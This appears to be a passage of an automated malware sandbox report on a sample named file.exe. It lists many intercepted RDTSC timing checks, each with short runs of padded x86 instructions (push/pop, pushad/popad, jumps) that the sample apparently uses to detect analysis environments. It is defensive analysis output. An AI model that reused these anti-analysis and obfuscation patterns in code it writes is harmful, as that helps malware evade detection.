                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C2CE8 second address: 10C2D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82078h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6A5F second address: 10C6A77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0640516B36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F0640516B3Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6A77 second address: 10C6A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA76 second address: 10CBA7C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA7C second address: 10CBA8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F0640D82066h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBA8D second address: 10CBA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0640516B38h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBBDC second address: 10CBBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBBE2 second address: 10CBC00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0640516B48h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBC00 second address: 10CBC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBD6C second address: 10CBD8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F0640516B36h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 jmp 00007F0640516B3Eh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBEF3 second address: 10CBF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0640D82066h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBF00 second address: 10CBF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBF08 second address: 10CBF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0304 second address: 10D030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D030C second address: 10D0321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0640D82066h 0x0000000a jmp 00007F0640D8206Ah 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0321 second address: 10D0349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0640516B44h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnp 00007F0640516B36h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0640516B36h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D04E4 second address: 10D04F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007F0640D8206Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D04F7 second address: 10D0533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F0640516B44h 0x0000000c jmp 00007F0640516B49h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D06C1 second address: 10D06D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0ACE second address: 10D0B07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0640516B3Fh 0x0000000e pushad 0x0000000f jo 00007F0640516B36h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jnl 00007F0640516B36h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D0C6C second address: 10D0C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8650 second address: 10D8654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6704 second address: 10D6708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6708 second address: 10D670C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D670C second address: 10D6712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6712 second address: 10D6718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6718 second address: 10D6741 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0640D8206Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82077h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6741 second address: 10D6747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6898 second address: 10D68C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0640D8206Eh 0x00000008 jmp 00007F0640D82075h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A0B second address: 10D6A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A0F second address: 10D6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A17 second address: 10D6A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A1D second address: 10D6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6A21 second address: 10D6A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C7A second address: 10D6C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C86 second address: 10D6C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D6C8A second address: 10D6C90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D728D second address: 10D72EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 js 00007F0640516B36h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 jg 00007F0640516B36h 0x00000018 jnp 00007F0640516B36h 0x0000001e pop edx 0x0000001f popad 0x00000020 pushad 0x00000021 jc 00007F0640516B38h 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007F0640516B42h 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 push esi 0x00000032 pop esi 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 jc 00007F0640516B36h 0x0000003b popad 0x0000003c jl 00007F0640516B49h 0x00000042 jmp 00007F0640516B3Dh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D75A9 second address: 10D75C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Dh 0x00000007 pushad 0x00000008 jne 00007F0640D82066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80A2 second address: 10D80B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0640516B36h 0x0000000a popad 0x0000000b popad 0x0000000c jl 00007F0640516B56h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80B9 second address: 10D80CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0640D82066h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D80CA second address: 10D80CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DDD4D second address: 10DDD51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DDD51 second address: 10DDD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F0640516B40h 0x0000000d jc 00007F0640516B36h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F0640516B48h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E05 second address: 10E0E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82077h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E21 second address: 10E0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E27 second address: 10E0E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82071h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0E3C second address: 10E0E4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E136F second address: 10E1375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1375 second address: 10E137B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E137B second address: 10E137F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E137F second address: 10E1383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1383 second address: 10E138F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E138F second address: 10E1393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1393 second address: 10E1397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1509 second address: 10E150E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E150E second address: 10E1514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1514 second address: 10E1518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1518 second address: 10E152A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E16A2 second address: 10E16A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E193B second address: 10E1965 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0640D82066h 0x00000009 jmp 00007F0640D82077h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jns 00007F0640D82066h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E991C second address: 10E992B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F0640516B36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E992B second address: 10E992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8058 second address: 10E8066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F0640516B36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8066 second address: 10E806F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E806F second address: 10E8075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8186 second address: 10E819F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82070h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E819F second address: 10E81A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85AE second address: 10E85BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jns 00007F0640D82066h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85BD second address: 10E85EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640516B44h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85EE second address: 10E85F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85F2 second address: 10E85F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E85F8 second address: 10E8614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640D82070h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8FE8 second address: 10E902E instructions: 0x00000000 rdtsc 0x00000002 js 00007F0640516B36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 jmp 00007F0640516B3Ch 0x00000015 jmp 00007F0640516B42h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F0640516B42h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E902E second address: 10E9048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82075h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97AA second address: 10E97AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97AF second address: 10E97B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97B5 second address: 10E97C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E97C0 second address: 10E97D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82072h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7650 second address: 10E765C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E765C second address: 10E7679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82072h 0x00000007 pushad 0x00000008 jns 00007F0640D82066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12C4 second address: 10F12C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12C8 second address: 10F12F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F0640D82076h 0x0000000f pushad 0x00000010 jns 00007F0640D82066h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12F1 second address: 10F12F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12F7 second address: 10F130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0640D8206Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0D26 second address: 10F0D39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0640516B3Ch 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110417E second address: 1104184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A461 second address: 110A467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A467 second address: 110A471 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A471 second address: 110A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A475 second address: 110A485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A485 second address: 110A48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A48F second address: 110A493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AB51 second address: 111AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0640516B38h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE66 second address: 111AE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE6C second address: 111AE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE70 second address: 111AE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE74 second address: 111AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0640516B48h 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F0640516B36h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BCA8 second address: 111BCB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0640D82066h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BCB8 second address: 111BCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0640516B36h 0x0000000a rdtsc
